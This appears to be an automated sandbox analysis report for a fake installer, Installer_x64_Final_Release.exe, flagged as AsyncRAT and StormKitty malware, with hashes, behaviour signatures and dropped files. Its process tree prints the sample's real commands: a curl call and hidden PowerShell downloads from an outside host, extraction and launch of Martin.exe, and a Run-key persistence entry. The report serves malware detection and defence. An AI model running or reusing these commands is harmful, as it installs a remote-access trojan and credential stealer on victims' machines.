Overview

overview

10

Static

static

1

Installer_...se.exe

windows7-x64

8

Installer_...se.exe

windows10-2004-x64

10

app-11.17....se.exe

windows10-2004-x64

10

app-11.17....lf.log

windows7-x64

1

app-11.17....lf.log

windows10-2004-x64

1

app-11.17....nt.pak

windows7-x64

3

app-11.17....nt.pak

windows10-2004-x64

3

app-11.17....nt.pak

windows7-x64

3

app-11.17....nt.pak

windows10-2004-x64

3

app-11.17....47.dll

windows10-2004-x64

1

app-11.17....eg.dll

windows7-x64

1

app-11.17....eg.dll

windows10-2004-x64

1

app-11.17....tl.dat

windows7-x64

3

app-11.17....tl.dat

windows10-2004-x64

3

app-11.17....GL.dll

windows7-x64

1

app-11.17....GL.dll

windows10-2004-x64

1

app-11.17....v2.dll

windows7-x64

1

app-11.17....v2.dll

windows10-2004-x64

1

app-11.17....GB.pak

windows7-x64

3

app-11.17....GB.pak

windows10-2004-x64

3

app-11.17....US.pak

windows7-x64

3

app-11.17....US.pak

windows10-2004-x64

3

app-11.17....uk.pak

windows7-x64

3

app-11.17....uk.pak

windows10-2004-x64

3

app-11.17....vi.pak

windows7-x64

3

app-11.17....vi.pak

windows10-2004-x64

3

app-11.17....CN.pak

windows7-x64

3

app-11.17....CN.pak

windows10-2004-x64

3

app-11.17....TW.pak

windows7-x64

3

app-11.17....TW.pak

windows10-2004-x64

3

app-11.17....es.pak

windows7-x64

3

app-11.17....es.pak

windows10-2004-x64

3

Analysis

  • max time kernel
    145s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-11-2024 13:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    app-11.17.0/Installer_x64_Final_Release.exe

  • Size

    95.5MB

  • MD5

    f2f9c5b1eb68455185007b88f103d600

  • SHA1

    84ab052e850735cda8f89c699863217e4f21fbbf

  • SHA256

    8d98a2d11c274829ecf4d8ec77762aafd94cae3d731de25e09d7e7eeb9f74088

  • SHA512

    6079f76fa212be5dbc301aa59c049a29a5c5671a94b48b416f64297777276dd2646676b47923dbfe5df5b61c54627c8221ea4fdd5b1d3a5c58e778bc85aa8bf2

  • SSDEEP

    1536:brae78zjORCDGwfdCSog01313QAjs5g+lmiujO3TlP76kn:RahKyd2n31n45vkSTlPJn

Score
10/10
asyncratstormkittydiscoveryexecutionpersistenceratstealer

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe
    "C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c sora.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1324
      • C:\Windows\system32\curl.exe
        curl -X GET https://cyberniton.com/star/process.php
        3⤵
          PID:4956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martin.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martin.zip'"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3308
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Martin.zip' -DestinationPath 'C:\Users\Public\Downloads\Martin' -Force"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Set-Location -Path 'C:\Users\Public\Downloads\Martin'; Start-Process 'Martin.exe'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3056
          • C:\Users\Public\Downloads\Martin\Martin.exe
            "C:\Users\Public\Downloads\Martin\Martin.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1808
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:4760
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1316
                6⤵
                • Program crash
                PID:4524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Martin' -Value 'cmd.exe /C start \"\" /D \"C:\Users\Public\Downloads\Martin\" \"C:\Users\Public\Downloads\Martin\Martin.exe\"'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1744
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c sorast.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martinst.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martinst.zip'"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3708
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4760 -ip 4760
      1⤵
        PID:2260

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        2e0c5a2ab49c3f6a8d6e99faf16c49e3

        SHA1

        3f053251d41c55f00fce122767ecf2257d2e9453

        SHA256

        1a5723e5e2937c5bcdee4de497815ca85c414f5e44c4eac53e691c0ce8476c89

        SHA512

        bd0ea9a68bec6314c3216abe98073bc886dce0d8b27f01edd697dfb2105047be3d1adec99b76d2572d6b2920855d2635d6de2e53a4b53c93d4604313dd33d2a6

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        eeb887cc7bbccf37b1f34da2fd210e6a

        SHA1

        f2e5a5a860071d01d0b2c5bd4f960367f2e7e234

        SHA256

        d81987248d2bc4067c883d296c1ef3fcb9fb8fe8e973edc6cd877e956fe02631

        SHA512

        0b8960f85fc22b2d5b1da7f141eb4e6deb410c1b5fb45c310d49b9e98f3f5de03f98b85be0ebd36975f4c41462a35a8108988dab03cebb414960a5bd7d3bb870

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        446dd1cf97eaba21cf14d03aebc79f27

        SHA1

        36e4cc7367e0c7b40f4a8ace272941ea46373799

        SHA256

        a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

        SHA512

        a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        a2b24af1492f112d2e53cb7415fda39f

        SHA1

        dbfcee57242a14b60997bd03379cc60198976d85

        SHA256

        fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

        SHA512

        9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat
        Filesize

        7KB

        MD5

        584db35e5bedc244c7fa8e96d72c4b4b

        SHA1

        e76629464cef09ce5ef474ff06731a5826b07cd6

        SHA256

        b65d65a027f3d6aad56c1d864347e2110fb4d42ebaf97b96ac6a689ba47891c3

        SHA512

        2eaa219af41107a2658823a9e5de5d1d19aa447f9eb3c1432bd12cec21647908bbe803d706097090ed192abea8b722bc548682877709623584ded5ccb4891075

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat
        Filesize

        7KB

        MD5

        0e3af1059504f34398373a7e5995cf5e

        SHA1

        748bb1a44b1c0754c0ee930ddcda67a1d4025d8d

        SHA256

        294cd777aed1e5bc55b7c2f29f6e38d1998f90da379904e1fdb9138c60a14144

        SHA512

        23cd71d9c8c0c8da56645b7e93215410224f3ea9c6fcecca5c8038a30813d65790ab4c44e22e55c0deac01c3c2c34d00a257d06688328d3167d3bfb0cc2d1c02

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kp1dbezq.3r0.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Public\Downloads\Martin\Martin.exe
        Filesize

        36KB

        MD5

        7f9be298e37baa0f13817a3e5ca399f8

        SHA1

        abf940d4dbc295f535df4140fe20f6fa509d7fcc

        SHA256

        0ec190f69979f59fb5d33f6f1231d5be05f02d1de05763cce4e474f7363aff95

        SHA512

        64c38caa11e3c14337c72aaf668a25e991c205778bf404c618a2e446cc4c066083e2fbc8146ad90a188b6102353d0dbe581b60ea38fad98a75914ba3857c5b75

        Download Submit

      • C:\Users\Public\Downloads\Martin\Qt5Core.dll
        Filesize

        4.8MB

        MD5

        c72524bcfd9b29c7c71f5af40a88d0bc

        SHA1

        2105d84397f6301c3641bbdf64d226e933caf4a9

        SHA256

        4828929b35af903a6d8429b34eefb418dc77a035eaa36a7308fb8ca404ac600f

        SHA512

        6d1b81b53bb1e4b21df01c5cf3c38c9597118aa181160939b33569e569e39f03a7b5ee8126f9a65df7d2101c97597fb1a4a03269585d8b187e41c06343471cb3

        Download Submit

      • C:\Users\Public\Downloads\Martin\concrt140e.dll
        Filesize

        2.3MB

        MD5

        96d4cb7c2e7193792bfd6b44240057d4

        SHA1

        95192a66380d9f7d3f9cafcbaebd6dfc0adaa5b6

        SHA256

        9ab56ce3cb9363dbf0490116c762b0d639935763ce3f94f24fedbf3462c88184

        SHA512

        e341c6b28ab5cc56c2e00ea5403863ed01426727f14bb6d7327ad815d3c4f177c4495606852b8817c5dc75e608be5f9b4225602ae74721525ded3f4e943ea213

        Download Submit

      • C:\Users\Public\Downloads\Martin\vcruntime140.dll
        Filesize

        84KB

        MD5

        3e746699828f9e9aab45b8f1c3cea4a1

        SHA1

        5ba84f26e47670c865e21e3303a28e54608475d3

        SHA256

        de6ca787d0e0a30810fea570db867199d32ed71867e1c36a0f58ed71d540f035

        SHA512

        ecc2c06a96661f063bbce91c5a7239e24aae3a5924ebb8773cef3d9e1d332959612bd052991ace98700d25912266ee39ee93ab623befd20f548d62f451426218

        Download Submit

      • memory/1808-131-0x00007FFB4E970000-0x00007FFB4EB65000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1808-132-0x00007FFB4D2D0000-0x00007FFB4D38E000-memory.dmp

        Filesize

        760KB

        Download

      • memory/3308-18-0x00007FFB2FBD3000-0x00007FFB2FBD5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3308-24-0x00007FFB2FBD0000-0x00007FFB30691000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3308-20-0x00007FFB2FBD0000-0x00007FFB30691000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3308-19-0x00007FFB2FBD0000-0x00007FFB30691000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3308-17-0x00007FFB2FBD0000-0x00007FFB30691000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3308-16-0x00007FFB2FBD0000-0x00007FFB30691000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3308-15-0x00000265FF680000-0x00000265FF6A2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3308-5-0x00007FFB2FBD3000-0x00007FFB2FBD5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4060-36-0x000001DAF7D80000-0x000001DAF7D92000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4060-37-0x000001DAF56F0000-0x000001DAF56FA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4760-138-0x0000000000400000-0x000000000064A000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/4760-141-0x0000000005BD0000-0x0000000006174000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4760-153-0x00000000056D0000-0x0000000005736000-memory.dmp

        Filesize

        408KB

        Download